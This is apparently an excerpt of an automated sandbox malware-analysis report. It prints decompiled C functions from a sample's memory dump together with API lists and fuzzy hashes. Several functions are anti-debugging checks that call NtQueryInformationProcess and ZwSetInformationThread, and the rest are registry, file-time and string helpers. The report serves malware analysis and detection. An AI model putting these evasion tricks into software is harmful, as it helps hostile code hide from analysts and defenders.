                                                                                                                                                                    • GetProcAddress.KERNEL32(?,NtQueryInformationProcess), ref: 10019F74
                                                                                                                                                                    • GetCurrentProcess.KERNEL32(0000001E,00000000,00000004,00000000), ref: 10019F87
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000002.00000002.356009315.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                    • Associated: 00000002.00000002.355968355.0000000010000000.00000004.00000001.sdmp
                                                                                                                                                                    • Associated: 00000002.00000002.356255402.0000000010023000.00000002.00000001.sdmp
                                                                                                                                                                    • Associated: 00000002.00000002.358191714.0000000010332000.00000004.00000001.sdmp
                                                                                                                                                                    • Associated: 00000002.00000002.358214423.0000000010337000.00000002.00000001.sdmp
                                                                                                                                                                    • Associated: 00000002.00000002.358225603.0000000010338000.00000004.00000001.sdmp
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: AddressCurrentLibraryLoadProcProcess
                                                                                                                                                                    • String ID: NtQueryInformationProcess$Ntdll.dll
                                                                                                                                                                    • API String ID: 353374858-801751246
                                                                                                                                                                    • Opcode ID: 5324bd590ae2d935f737936b9c2bb7a29ce3f6ecd0286ca9cc490fcedce8d1c6
                                                                                                                                                                    • Instruction ID: 4290971ec9e7b3841b7fe9691c0d5d42a9a3d927b1d111e6c5789e877817e371
                                                                                                                                                                    • Opcode Fuzzy Hash: 5324bd590ae2d935f737936b9c2bb7a29ce3f6ecd0286ca9cc490fcedce8d1c6
                                                                                                                                                                    • Instruction Fuzzy Hash: 7FF0A575900218FBEB00EBE0DD89BDDBBB8EB04705F618498EA01A6280DA745A49DB65
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    C-Code - Quality: 68%
                                                                                                                                                                    			E10019FA0() {
                                                                                                                                                                    				char _v8;
                                                                                                                                                                    				_Unknown_base(*)()* _v12;
                                                                                                                                                                    				struct HINSTANCE__* _v16;
                                                                                                                                                                    
                                                                                                                                                                    				_v8 = 0;
                                                                                                                                                                    				_v16 = LoadLibraryA("Ntdll.dll");
                                                                                                                                                                    				_v12 = GetProcAddress(_v16, "NtQueryInformationProcess");
                                                                                                                                                                    				_v12(GetCurrentProcess(), 7,  &_v8, 4, 0);
                                                                                                                                                                    				return 0 | _v8 != 0x00000000;
                                                                                                                                                                    			}







                                                                                                                                                                    APIs
                                                                                                                                                                    • LoadLibraryA.KERNEL32(Ntdll.dll), ref: 10019FB2
                                                                                                                                                                    • GetProcAddress.KERNEL32(?,NtQueryInformationProcess), ref: 10019FC4
                                                                                                                                                                    • GetCurrentProcess.KERNEL32(00000007,00000000,00000004,00000000), ref: 10019FD7
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000002.00000002.356009315.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                    • Associated: 00000002.00000002.355968355.0000000010000000.00000004.00000001.sdmp
                                                                                                                                                                    • Associated: 00000002.00000002.356255402.0000000010023000.00000002.00000001.sdmp
                                                                                                                                                                    • Associated: 00000002.00000002.358191714.0000000010332000.00000004.00000001.sdmp
                                                                                                                                                                    • Associated: 00000002.00000002.358214423.0000000010337000.00000002.00000001.sdmp
                                                                                                                                                                    • Associated: 00000002.00000002.358225603.0000000010338000.00000004.00000001.sdmp
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: AddressCurrentLibraryLoadProcProcess
                                                                                                                                                                    • String ID: NtQueryInformationProcess$Ntdll.dll
                                                                                                                                                                    • API String ID: 353374858-801751246
                                                                                                                                                                    • Opcode ID: e4e449fd2582a4a912ce4590722a3fea1b530a5e0b7ff34467c0788b23f79e4c
                                                                                                                                                                    • Instruction ID: a091bf084543d9cc22bc0e3cc688341cf2a1c1168494879eaf10af3ffd9ffb2e
                                                                                                                                                                    • Opcode Fuzzy Hash: e4e449fd2582a4a912ce4590722a3fea1b530a5e0b7ff34467c0788b23f79e4c
                                                                                                                                                                    • Instruction Fuzzy Hash: EEF0C075D44208FFEB00DFE0DD4DB9DBBB8EB04301F518494FA05A6180D7745A49CB65
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    C-Code - Quality: 68%
                                                                                                                                                                    			E10019D40() {
                                                                                                                                                                    				_Unknown_base(*)()* _v8;
                                                                                                                                                                    				struct HINSTANCE__* _v12;
                                                                                                                                                                    
                                                                                                                                                                    				_v12 = LoadLibraryA("Ntdll.dll");
                                                                                                                                                                    				_v8 = GetProcAddress(_v12, "ZwSetInformationThread");
                                                                                                                                                                    				return _v8(GetCurrentThread(), 0x11, 0, 0);
                                                                                                                                                                    			}






                                                                                                                                                                    APIs
                                                                                                                                                                    • LoadLibraryA.KERNEL32(Ntdll.dll,?,100206A1), ref: 10019D4B
                                                                                                                                                                    • GetProcAddress.KERNEL32(?,ZwSetInformationThread), ref: 10019D5D
                                                                                                                                                                    • GetCurrentThread.KERNEL32 ref: 10019D6C
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000002.00000002.356009315.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                    • Associated: 00000002.00000002.355968355.0000000010000000.00000004.00000001.sdmp
                                                                                                                                                                    • Associated: 00000002.00000002.356255402.0000000010023000.00000002.00000001.sdmp
                                                                                                                                                                    • Associated: 00000002.00000002.358191714.0000000010332000.00000004.00000001.sdmp
                                                                                                                                                                    • Associated: 00000002.00000002.358214423.0000000010337000.00000002.00000001.sdmp
                                                                                                                                                                    • Associated: 00000002.00000002.358225603.0000000010338000.00000004.00000001.sdmp
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: AddressCurrentLibraryLoadProcThread
                                                                                                                                                                    • String ID: Ntdll.dll$ZwSetInformationThread
                                                                                                                                                                    • API String ID: 903204110-1680533912
                                                                                                                                                                    • Opcode ID: 68ad7e6b782c0f1e3664fc4a4fea26a1abbd1340330e0d1141474a821f8a2a15
                                                                                                                                                                    • Instruction ID: 29caf765b55be7bf21a38254d48f72174c1d944e91014696290b2e85dee50fc2
                                                                                                                                                                    • Opcode Fuzzy Hash: 68ad7e6b782c0f1e3664fc4a4fea26a1abbd1340330e0d1141474a821f8a2a15
                                                                                                                                                                    • Instruction Fuzzy Hash: 5CE0EC74940208FBFF00EBE0AD8DB9CBB78FB04702F618095FE01A6280DAB059058AB5
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    C-Code - Quality: 93%
                                                                                                                                                                    			E1001F4A0(void* _a4, char* _a8) {
                                                                                                                                                                    				char* _v8;
                                                                                                                                                                    				struct _FILETIME _v12;
                                                                                                                                                                    				void* _v16;
                                                                                                                                                                    				struct _SYSTEMTIME _v32;
                                                                                                                                                                    				char* _v40;
                                                                                                                                                                    				char* _v44;
                                                                                                                                                                    				struct _FILETIME _v52;
                                                                                                                                                                    				char* _t43;
                                                                                                                                                                    
                                                                                                                                                                    				_v44 = 0;
                                                                                                                                                                    				_v40 = 0;
                                                                                                                                                                    				_v16 = 0;
                                                                                                                                                                    				if(RegOpenKeyExA(_a4, _a8, 0, 0x101,  &_v16) == 0) {
                                                                                                                                                                    					if(RegQueryInfoKeyA(_v16, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,  &_v12) == 0) {
                                                                                                                                                                    						_v32.wYear = 0x7b2;
                                                                                                                                                                    						_v32.wMonth = 1;
                                                                                                                                                                    						_v32.wDay = 1;
                                                                                                                                                                    						_v32.wHour = 0;
                                                                                                                                                                    						_v32.wMinute = 0;
                                                                                                                                                                    						_v32.wSecond = 0;
                                                                                                                                                                    						_v32.wMilliseconds = 0;
                                                                                                                                                                    						SystemTimeToFileTime( &_v32,  &_v52);
                                                                                                                                                                    						_t43 = _v8;
                                                                                                                                                                    						asm("sbb edx, [ebp-0x2c]");
                                                                                                                                                                    						_v44 = E1000F290(_v12 - _v52.dwLowDateTime, _t43, 0x2710, 0);
                                                                                                                                                                    						_v40 = _t43;
                                                                                                                                                                    					}
                                                                                                                                                                    					RegCloseKey(_v16);
                                                                                                                                                                    				}
                                                                                                                                                                    				return _v44;
                                                                                                                                                                    			}












                                                                                                                                                                    APIs
                                                                                                                                                                    • RegOpenKeyExA.ADVAPI32(?,00000000,00000000,00000101,00000000), ref: 1001F4CE
                                                                                                                                                                    • RegQueryInfoKeyA.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 1001F4F8
                                                                                                                                                                    • SystemTimeToFileTime.KERNEL32(000007B2,?), ref: 1001F534
                                                                                                                                                                    • __aulldiv.LIBCMT ref: 1001F54F
                                                                                                                                                                    • RegCloseKey.ADVAPI32(00000000), ref: 1001F55E
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000002.00000002.356009315.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                    • Associated: 00000002.00000002.355968355.0000000010000000.00000004.00000001.sdmp
                                                                                                                                                                    • Associated: 00000002.00000002.356255402.0000000010023000.00000002.00000001.sdmp
                                                                                                                                                                    • Associated: 00000002.00000002.358191714.0000000010332000.00000004.00000001.sdmp
                                                                                                                                                                    • Associated: 00000002.00000002.358214423.0000000010337000.00000002.00000001.sdmp
                                                                                                                                                                    • Associated: 00000002.00000002.358225603.0000000010338000.00000004.00000001.sdmp
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Time$CloseFileInfoOpenQuerySystem__aulldiv
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 3147484438-0
                                                                                                                                                                    • Opcode ID: a8ab192541b304aa3f493e8cdc4c5a5724217b095628cd1a61777f2edf0513dd
                                                                                                                                                                    • Instruction ID: 6ac3f46dae9d66049611ff428ba7790207c0dca18eda03b4da7369df6ee0e458
                                                                                                                                                                    • Opcode Fuzzy Hash: a8ab192541b304aa3f493e8cdc4c5a5724217b095628cd1a61777f2edf0513dd
                                                                                                                                                                    • Instruction Fuzzy Hash: 6D21FC75E10208ABEB00CFD4C898FEEB7B9FF48704F108548E514BB290D7B59A45CBA5
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    C-Code - Quality: 93%
                                                                                                                                                                    			E1001F3D0(char* _a4) {
                                                                                                                                                                    				struct _SYSTEMTIME _v20;
                                                                                                                                                                    				struct _SECURITY_ATTRIBUTES* _v24;
                                                                                                                                                                    				struct _SECURITY_ATTRIBUTES* _v28;
                                                                                                                                                                    				struct _FILETIME _v36;
                                                                                                                                                                    				struct _FILETIME _v44;
                                                                                                                                                                    				struct _FILETIME _v52;
                                                                                                                                                                    				struct _FILETIME _v60;
                                                                                                                                                                    				void* _v64;
                                                                                                                                                                    				struct _SECURITY_ATTRIBUTES* _t44;
                                                                                                                                                                    
                                                                                                                                                                    				_v28 = 0;
                                                                                                                                                                    				_v24 = 0;
                                                                                                                                                                    				if(PathFileExistsA(_a4) != 0) {
                                                                                                                                                                    					_v64 = CreateFileA(_a4, 0x80000000, 1, 0, 3, 0x2000000, 0);
                                                                                                                                                                    					if(_v64 != 0xffffffff && GetFileTime(_v64,  &_v36,  &_v44,  &_v52) != 0) {
                                                                                                                                                                    						_v20.wYear = 0x7b2;
                                                                                                                                                                    						_v20.wMonth = 1;
                                                                                                                                                                    						_v20.wDay = 1;
                                                                                                                                                                    						_v20.wHour = 0;
                                                                                                                                                                    						_v20.wMinute = 0;
                                                                                                                                                                    						_v20.wSecond = 0;
                                                                                                                                                                    						_v20.wMilliseconds = 0;
                                                                                                                                                                    						SystemTimeToFileTime( &_v20,  &_v60);
                                                                                                                                                                    						_t44 = _v36.dwLowDateTime - _v60.dwLowDateTime;
                                                                                                                                                                    						asm("sbb eax, [ebp-0x34]");
                                                                                                                                                                    						_v28 = E1000F290(_t44, _v36.dwHighDateTime, 0x2710, 0);
                                                                                                                                                                    						_v24 = _t44;
                                                                                                                                                                    					}
                                                                                                                                                                    				}
                                                                                                                                                                    				return _v28;
                                                                                                                                                                    			}













                                                                                                                                                                    APIs
                                                                                                                                                                    • PathFileExistsA.SHLWAPI(?), ref: 1001F3E8
                                                                                                                                                                    • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,02000000,00000000), ref: 1001F40C
                                                                                                                                                                    • GetFileTime.KERNEL32(000000FF,?,?,?), ref: 1001F42B
                                                                                                                                                                    • SystemTimeToFileTime.KERNEL32(000007B2,?), ref: 1001F467
                                                                                                                                                                    • __aulldiv.LIBCMT ref: 1001F482
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000002.00000002.356009315.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                    • Associated: 00000002.00000002.355968355.0000000010000000.00000004.00000001.sdmp
                                                                                                                                                                    • Associated: 00000002.00000002.356255402.0000000010023000.00000002.00000001.sdmp
                                                                                                                                                                    • Associated: 00000002.00000002.358191714.0000000010332000.00000004.00000001.sdmp
                                                                                                                                                                    • Associated: 00000002.00000002.358214423.0000000010337000.00000002.00000001.sdmp
                                                                                                                                                                    • Associated: 00000002.00000002.358225603.0000000010338000.00000004.00000001.sdmp
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: File$Time$CreateExistsPathSystem__aulldiv
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 3038978132-0
                                                                                                                                                                    • Opcode ID: e720a0e6c976b777c225cc2672a2eaa0af2df3213120956698ec805836ce489b
                                                                                                                                                                    • Instruction ID: 94f5442095f36b7f33c28a28e912268f677076f0b3d524be3b20220ad1e1facd
                                                                                                                                                                    • Opcode Fuzzy Hash: e720a0e6c976b777c225cc2672a2eaa0af2df3213120956698ec805836ce489b
                                                                                                                                                                    • Instruction Fuzzy Hash: 9A21E875A10208ABEB00DFD4D899FEEB7B8EF08704F108608E505BB290D775A685CBA5
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                    			E10019330(void* __ebx, void* __edi, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
                                                                                                                                                                    				intOrPtr _v8;
                                                                                                                                                                    				intOrPtr _v12;
                                                                                                                                                                    				void* _t17;
                                                                                                                                                                    				void* _t18;
                                                                                                                                                                    				void* _t19;
                                                                                                                                                                    				void* _t21;
                                                                                                                                                                    				void* _t25;
                                                                                                                                                                    				void* _t30;
                                                                                                                                                                    				void* _t38;
                                                                                                                                                                    				void* _t42;
                                                                                                                                                                    				void* _t44;
                                                                                                                                                                    				void* _t46;
                                                                                                                                                                    
                                                                                                                                                                    				_t38 = __edi;
                                                                                                                                                                    				_t30 = __ebx;
                                                                                                                                                                    				_t17 = E1000CAC0(_a4);
                                                                                                                                                                    				_t18 = E1000CAC0(_a8);
                                                                                                                                                                    				_t44 = _t42 + 8;
                                                                                                                                                                    				if(_t17 >= _t18) {
                                                                                                                                                                    					_v8 = _a4;
                                                                                                                                                                    					_v12 = 0;
                                                                                                                                                                    					while(1) {
                                                                                                                                                                    						_t19 = E1000CAC0(_a8);
                                                                                                                                                                    						_t21 = E1000CAC0(_a4);
                                                                                                                                                                    						_t46 = _t44 + 8;
                                                                                                                                                                    						if(_t19 + _v12 > _t21) {
                                                                                                                                                                    							break;
                                                                                                                                                                    						}
                                                                                                                                                                    						_t25 = E1000E89F(_t30, _a8, _t38, _v8, _a8, E1000CAC0(_a8));
                                                                                                                                                                    						_t44 = _t46 + 0x10;
                                                                                                                                                                    						if(_t25 != 0) {
                                                                                                                                                                    							_v12 = _v12 + 1;
                                                                                                                                                                    							_v8 = _v8 + 1;
                                                                                                                                                                    							continue;
                                                                                                                                                                    						}
                                                                                                                                                                    						return 1;
                                                                                                                                                                    					}
                                                                                                                                                                    					return 0;
                                                                                                                                                                    				}
                                                                                                                                                                    				return 0;
                                                                                                                                                                    			}
















                                                                                                                                                                    APIs
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000002.00000002.356009315.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                    • Associated: 00000002.00000002.355968355.0000000010000000.00000004.00000001.sdmp
                                                                                                                                                                    • Associated: 00000002.00000002.356255402.0000000010023000.00000002.00000001.sdmp
                                                                                                                                                                    • Associated: 00000002.00000002.358191714.0000000010332000.00000004.00000001.sdmp
                                                                                                                                                                    • Associated: 00000002.00000002.358214423.0000000010337000.00000002.00000001.sdmp
                                                                                                                                                                    • Associated: 00000002.00000002.358225603.0000000010338000.00000004.00000001.sdmp
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: _strlen
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 4218353326-0
                                                                                                                                                                    • Opcode ID: 2e95c50b6762c7a11e15052646cc8f45d1bd71e23564d2a17366cbdfb9a5a65b
                                                                                                                                                                    • Instruction ID: fd93541d7ed1397f6a851c7bfd43323bc4bd1343b06978e00cafc39966250b4e
                                                                                                                                                                    • Opcode Fuzzy Hash: 2e95c50b6762c7a11e15052646cc8f45d1bd71e23564d2a17366cbdfb9a5a65b
                                                                                                                                                                    • Instruction Fuzzy Hash: 571177BAE0420CE7DB10DFA8D88199E77A8DB04298F148565FD19EB345F531FF808792
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                    			E100196D0(void* __ebx, void* __edi, intOrPtr _a4, intOrPtr _a8) {
                                                                                                                                                                    				intOrPtr _v8;
                                                                                                                                                                    				intOrPtr _v12;
                                                                                                                                                                    				void* _t20;
                                                                                                                                                                    				void* _t21;
                                                                                                                                                                    				void* _t23;
                                                                                                                                                                    				void* _t24;
                                                                                                                                                                    				void* _t27;
                                                                                                                                                                    				void* _t28;
                                                                                                                                                                    				void* _t36;
                                                                                                                                                                    				void* _t40;
                                                                                                                                                                    				void* _t42;
                                                                                                                                                                    				void* _t44;
                                                                                                                                                                    
                                                                                                                                                                    				_t36 = __edi;
                                                                                                                                                                    				_t28 = __ebx;
                                                                                                                                                                    				_v8 = 0;
                                                                                                                                                                    				if(_a4 != 0 && _a8 != 0) {
                                                                                                                                                                    					_t20 = E1000CAC0(_a4);
                                                                                                                                                                    					_t21 = E1000CAC0(_a8);
                                                                                                                                                                    					_t42 = _t40 + 8;
                                                                                                                                                                    					if(_t20 >= _t21) {
                                                                                                                                                                    						_v12 = 0;
                                                                                                                                                                    						while(1) {
                                                                                                                                                                    							_t23 = E1000CAC0(_a4);
                                                                                                                                                                    							_t24 = E1000CAC0(_a8);
                                                                                                                                                                    							_t44 = _t42 + 8;
                                                                                                                                                                    							if(_v12 >= _t23 - _t24) {
                                                                                                                                                                    								goto L9;
                                                                                                                                                                    							}
                                                                                                                                                                    							_t27 = E1000E89F(_t28, _a8, _t36, _a4 + _v12, _a8, E1000CAC0(_a8));
                                                                                                                                                                    							_t42 = _t44 + 0x10;
                                                                                                                                                                    							if(_t27 != 0) {
                                                                                                                                                                    								_v12 = _v12 + 1;
                                                                                                                                                                    								continue;
                                                                                                                                                                    							} else {
                                                                                                                                                                    								_v8 = 1;
                                                                                                                                                                    							}
                                                                                                                                                                    							goto L9;
                                                                                                                                                                    						}
                                                                                                                                                                    					}
                                                                                                                                                                    				}
                                                                                                                                                                    				L9:
                                                                                                                                                                    				return _v8;
                                                                                                                                                                    			}
















                                                                                                                                                                    APIs
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000002.00000002.356009315.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                    • Associated: 00000002.00000002.355968355.0000000010000000.00000004.00000001.sdmp
                                                                                                                                                                    • Associated: 00000002.00000002.356255402.0000000010023000.00000002.00000001.sdmp
                                                                                                                                                                    • Associated: 00000002.00000002.358191714.0000000010332000.00000004.00000001.sdmp
                                                                                                                                                                    • Associated: 00000002.00000002.358214423.0000000010337000.00000002.00000001.sdmp
                                                                                                                                                                    • Associated: 00000002.00000002.358225603.0000000010338000.00000004.00000001.sdmp
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: _strlen
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 4218353326-0
                                                                                                                                                                    • Opcode ID: 8611dd32ed2c8444fb0f5c1ea4afab806a2b034aeaa9f588fce8cf00fcbf311d
                                                                                                                                                                    • Instruction ID: 7552c70825ce5aa6cbe61f7ae5d70de39af72cecddf3b8ac3a80b57e73ca6885
                                                                                                                                                                    • Opcode Fuzzy Hash: 8611dd32ed2c8444fb0f5c1ea4afab806a2b034aeaa9f588fce8cf00fcbf311d
                                                                                                                                                                    • Instruction Fuzzy Hash: 4311ABBAD1420CEBDB14CFA4D485B9D77A4EF0428CF048165FC0A9B245E635EB84CB82
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    C-Code - Quality: 67%
                                                                                                                                                                    			E1000EA65(void* __ebx, void* __edi) {
                                                                                                                                                                    
                                                                                                                                                                    				E100130A0();
                                                                                                                                                                    				if(E100148B1(1, 0x214) != __edi) {
                                                                                                                                                                    					_push(__esi);
                                                                                                                                                                    					_push( *0x10332c68);
                                                                                                                                                                    					__eax = E10013034( *0x10333820);
                                                                                                                                                                    					__eflags = __eax;
                                                                                                                                                                    					if(__eflags == 0) {
                                                                                                                                                                    						_push(__esi);
                                                                                                                                                                    						__eax = E1000CA30(__ebx, __edi, __esi, __eflags);
                                                                                                                                                                    						goto L1;
                                                                                                                                                                    					} else {
                                                                                                                                                                    						_push(__edi);
                                                                                                                                                                    						_push(__esi);
                                                                                                                                                                    						__eax = E10013107(__ebx, __edi, __esi, __eflags);
                                                                                                                                                                    						__eax = GetCurrentThreadId();
                                                                                                                                                                    						__esi[1] = __esi[1] | 0xffffffff;
                                                                                                                                                                    						 *__esi = __eax;
                                                                                                                                                                    						0 = 1;
                                                                                                                                                                    						__eflags = 1;
                                                                                                                                                                    					}
                                                                                                                                                                    				}
                                                                                                                                                                    				return 0;
                                                                                                                                                                    			}




                                                                                                                                                                    APIs
                                                                                                                                                                    • ___set_flsgetvalue.LIBCMT ref: 1000EA65
                                                                                                                                                                      • Part of subcall function 100130A0: TlsGetValue.KERNEL32(100131CA), ref: 100130A6
                                                                                                                                                                      • Part of subcall function 100130A0: __decode_pointer.LIBCMT ref: 100130B6
                                                                                                                                                                      • Part of subcall function 100130A0: TlsSetValue.KERNEL32(00000000), ref: 100130C3
                                                                                                                                                                    • __calloc_crt.LIBCMT ref: 1000EA71
                                                                                                                                                                      • Part of subcall function 100148B1: __calloc_impl.LIBCMT ref: 100148BF
                                                                                                                                                                      • Part of subcall function 100148B1: Sleep.KERNEL32(00000000,100131F0,00000001,00000214), ref: 100148D6
                                                                                                                                                                    • __decode_pointer.LIBCMT ref: 1000EA8F
                                                                                                                                                                      • Part of subcall function 10013034: TlsGetValue.KERNEL32(?,100133C2,00000000,00000000,1000EAC9,00000000,?,?,00000001,?,?,1000EB2D,00000001,?,?,10330240), ref: 10013041
                                                                                                                                                                      • Part of subcall function 10013034: TlsGetValue.KERNEL32(00000005,?,100133C2,00000000,00000000,1000EAC9,00000000,?,?,00000001,?,?,1000EB2D,00000001), ref: 10013058
                                                                                                                                                                    • __initptd.LIBCMT ref: 1000EA9D
                                                                                                                                                                      • Part of subcall function 10013107: GetModuleHandleA.KERNEL32(KERNEL32.DLL,10330340,0000000C,10013219,00000000,00000000), ref: 10013118
                                                                                                                                                                      • Part of subcall function 10013107: GetProcAddress.KERNEL32(00000000,EncodePointer), ref: 10013141
                                                                                                                                                                      • Part of subcall function 10013107: GetProcAddress.KERNEL32(?,DecodePointer), ref: 10013151
                                                                                                                                                                      • Part of subcall function 10013107: InterlockedIncrement.KERNEL32(10332650), ref: 10013173
                                                                                                                                                                      • Part of subcall function 10013107: ___addlocaleref.LIBCMT ref: 1001319A
                                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 1000EAA4
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000002.00000002.356009315.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                    • Associated: 00000002.00000002.355968355.0000000010000000.00000004.00000001.sdmp
                                                                                                                                                                    • Associated: 00000002.00000002.356255402.0000000010023000.00000002.00000001.sdmp
                                                                                                                                                                    • Associated: 00000002.00000002.358191714.0000000010332000.00000004.00000001.sdmp
                                                                                                                                                                    • Associated: 00000002.00000002.358214423.0000000010337000.00000002.00000001.sdmp
                                                                                                                                                                    • Associated: 00000002.00000002.358225603.0000000010338000.00000004.00000001.sdmp
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Value$AddressProc__decode_pointer$CurrentHandleIncrementInterlockedModuleSleepThread___addlocaleref___set_flsgetvalue__calloc_crt__calloc_impl__initptd
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 1662683381-0
                                                                                                                                                                    • Opcode ID: 4523e30f6971cb40a2426855bbae9302a8168ff4489a0cf2ac2da806801fc158
                                                                                                                                                                    • Instruction ID: d37afd26d2eadf3ef50fe9e24c1f066afac95630afcebaca695182ecfc570b21
                                                                                                                                                                    • Opcode Fuzzy Hash: 4523e30f6971cb40a2426855bbae9302a8168ff4489a0cf2ac2da806801fc158
                                                                                                                                                                    • Instruction Fuzzy Hash: 62F027373042A1ADF235F774AC4294E37C4EB8A3F1730892AF552EC0E5EE21E8808261
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    C-Code - Quality: 83%
                                                                                                                                                                    			E1001A740(void* __ebx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4) {
                                                                                                                                                                    				char _v8;
                                                                                                                                                                    				intOrPtr _v16;
                                                                                                                                                                    				char _v279;
                                                                                                                                                                    				char _v280;
                                                                                                                                                                    				intOrPtr _v284;
                                                                                                                                                                    				char _v312;
                                                                                                                                                                    				signed int _v316;
                                                                                                                                                                    				void* __ebp;
                                                                                                                                                                    				void* _t27;
                                                                                                                                                                    				intOrPtr _t52;
                                                                                                                                                                    				void* _t55;
                                                                                                                                                                    
                                                                                                                                                                    				_t51 = __esi;
                                                                                                                                                                    				_t50 = __edi;
                                                                                                                                                                    				_t37 = __ebx;
                                                                                                                                                                    				_push(0xffffffff);
                                                                                                                                                                    				_push(E10022AB3);
                                                                                                                                                                    				_push( *[fs:0x0]);
                                                                                                                                                                    				 *[fs:0x0] = _t52;
                                                                                                                                                                    				_v316 = 0;
                                                                                                                                                                    				E10001160( &_v312, __eflags, 0x10024c8f);
                                                                                                                                                                    				_v8 = 0;
                                                                                                                                                                    				_v280 = 0;
                                                                                                                                                                    				E1000CF20(__edi,  &_v279, 0, 0x103);
                                                                                                                                                                    				E1001DC00(__ebx, _t50, __esi,  &_v280);
                                                                                                                                                                    				_t46 =  &_v280;
                                                                                                                                                                    				_t27 = E1000CAC0( &_v280);
                                                                                                                                                                    				_t55 = _t52 - 0x12c + 0x10;
                                                                                                                                                                    				_t59 = _t27;
                                                                                                                                                                    				if(_t27 == 0) {
                                                                                                                                                                    					E1000D8A3( &_v280,  &_v280, 0x104, "unknown err");
                                                                                                                                                                    					_t55 = _t55 + 0xc;
                                                                                                                                                                    				}
                                                                                                                                                                    				_v284 = E1001A480(_t37, _t46, _t50, _t51, _t59,  &_v280);
                                                                                                                                                                    				E100011C0( &_v312, _v284);
                                                                                                                                                                    				_push(_v284);
                                                                                                                                                                    				E1000CA30(_t37, _t50, _t51, _t59);
                                                                                                                                                                    				E10001110(_a4, _t59,  &_v312);
                                                                                                                                                                    				_v316 = _v316 | 0x00000001;
                                                                                                                                                                    				_v8 = 0xffffffff;
                                                                                                                                                                    				E100011A0( &_v312);
                                                                                                                                                                    				 *[fs:0x0] = _v16;
                                                                                                                                                                    				return _a4;
                                                                                                                                                                    			}

                                                                                                                                                                    APIs
                                                                                                                                                                    • _memset.LIBCMT ref: 1001A794
                                                                                                                                                                      • Part of subcall function 1001DC00: _memset.LIBCMT ref: 1001DC28
                                                                                                                                                                      • Part of subcall function 1001DC00: _memset.LIBCMT ref: 1001DC45
                                                                                                                                                                      • Part of subcall function 1001DC00: _memset.LIBCMT ref: 1001DC5B
                                                                                                                                                                      • Part of subcall function 1001DC00: GetVersionExW.KERNEL32(00000114), ref: 1001DC74
                                                                                                                                                                      • Part of subcall function 1001DC00: _strcpy_s.LIBCMT ref: 1001DDA9
                                                                                                                                                                    • _strlen.LIBCMT ref: 1001A7AF
                                                                                                                                                                    • _strcpy_s.LIBCMT ref: 1001A7CC
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000002.00000002.356009315.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                    • Associated: 00000002.00000002.355968355.0000000010000000.00000004.00000001.sdmp
                                                                                                                                                                    • Associated: 00000002.00000002.356255402.0000000010023000.00000002.00000001.sdmp
                                                                                                                                                                    • Associated: 00000002.00000002.358191714.0000000010332000.00000004.00000001.sdmp
                                                                                                                                                                    • Associated: 00000002.00000002.358214423.0000000010337000.00000002.00000001.sdmp
                                                                                                                                                                    • Associated: 00000002.00000002.358225603.0000000010338000.00000004.00000001.sdmp
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: _memset$_strcpy_s$Version_strlen
                                                                                                                                                                    • String ID: unknown err
